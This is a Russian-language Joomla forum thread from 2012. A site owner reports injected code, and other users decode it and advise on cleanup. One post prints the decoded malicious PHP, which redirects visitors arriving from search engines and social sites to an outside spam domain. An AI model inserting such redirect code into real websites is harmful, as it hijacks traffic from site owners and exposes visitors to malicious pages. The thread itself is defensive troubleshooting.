1. Уважаемые пользователи, прежде чем ответить в теме или создать новую,
    внимательно ознакомьтесь с правилами раздела

    Кому лень работать или руки не оттуда - пользуйтесь услугами специалистов
  2. Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.."

    Есть JED!!! Ищите там!!!

Помощь Вирус

Тема в разделе "Joomla", создана пользователем Sudba, 12 дек 2012.

Информация :
  • Уважаемые пользователи, прежде чем ответить в теме или создать новую, внимательно ознакомьтесь с правилами раздела
  • Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.." Есть JED!!! Ищите там!!!
  • Аналоги ищите там же - на JED!!!
  • Новая версия? - У кого будет - тот выложит!
Статус темы:
Закрыта.
Модераторы: arman29, DMS, NightHunter
  1. Sudba

    Sudba

    Регистр.:
    6 дек 2007
    Сообщения:
    885
    Симпатии:
    45
    Всем привет. На джумле появился код вида:
    удалил его через автозамену.
    А как спастись от дальнейшего проникновения то?
    Пароли на доступы менял.
     
  2. edward1995

    edward1995 Создатель

    Заблокирован
    Регистр.:
    26 мар 2012
    Сообщения:
    21
    Симпатии:
    18
    ну для начала скинь код ))) сюда без хайда я расщефрую и тогда скажем что делает вирус )) и как с ним бороться
    eval(base64_decode* Это значит что он закодирован )))
     
  3. Sudba

    Sudba

    Регистр.:
    6 дек 2007
    Сообщения:
    885
    Симпатии:
    45
    Вот код:
     
  4. akifjev

    akifjev

    Регистр.:
    15 июл 2009
    Сообщения:
    200
    Симпатии:
    44
    Скрипт если определяет, что страницу запрашивает поисковый робот, то автоматом отправляет этого робота на сайт:
    allcodeer.qpoe.com
     
  5. edward1995

    edward1995 Создатель

    Заблокирован
    Регистр.:
    26 мар 2012
    Сообщения:
    21
    Симпатии:
    18
    повторюсь более открыто
    error_reporting(0);
    $nccv=headers_sent();
    if (!$nccv){
    $referer=$_SERVER['HTTP_REFERER'];
    $ua=$_SERVER['HTTP_USER_AGENT'];
    if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
    header("Location: http://allcodeer.qpoe.com/");
    exit();
    }
    }
    }
    он перенаправляет поисковый робот на определенную страницы какие конкретна поисковики видно по скрипту верху
     
  6. Sudba

    Sudba

    Регистр.:
    6 дек 2007
    Сообщения:
    885
    Симпатии:
    45
    Так я его удалил. Как себя защитить то?
     
  7. edward1995

    edward1995 Создатель

    Заблокирован
    Регистр.:
    26 мар 2012
    Сообщения:
    21
    Симпатии:
    18
    ну так и все ))) глянь фтп пароли и ssh и глянь есть может стремные компоненты
     
  8. Roamer

    Roamer Создатель

    Регистр.:
    17 ноя 2012
    Сообщения:
    35
    Симпатии:
    0
    так..... Автор, подробнее - как ты выследил, что появился инородный код? В каком файле нашел? У меня стоит скрытый блок с двумя ссылками. :( Как еще могут зашифровать этот код? Какие словосочетания нужно попробовать поискать?
     
  9. edward1995

    edward1995 Создатель

    Заблокирован
    Регистр.:
    26 мар 2012
    Сообщения:
    21
    Симпатии:
    18
    просто открыл и зная что джумла не зашифрована )) нашел странный код ) вот и все ) если ты нашел что-то странное код сюда нас тут много ))) раскодируем :-]и закодируем )))
     
  10. al-teen

    al-teen Постоялец

    Регистр.:
    1 сен 2012
    Сообщения:
    75
    Симпатии:
    5
    Ну прямо и взяться левому коду неоткуда, ага? Меньше хлама с варезников типа жумла-мастер будете в след. раз ставить.
     
Статус темы:
Закрыта.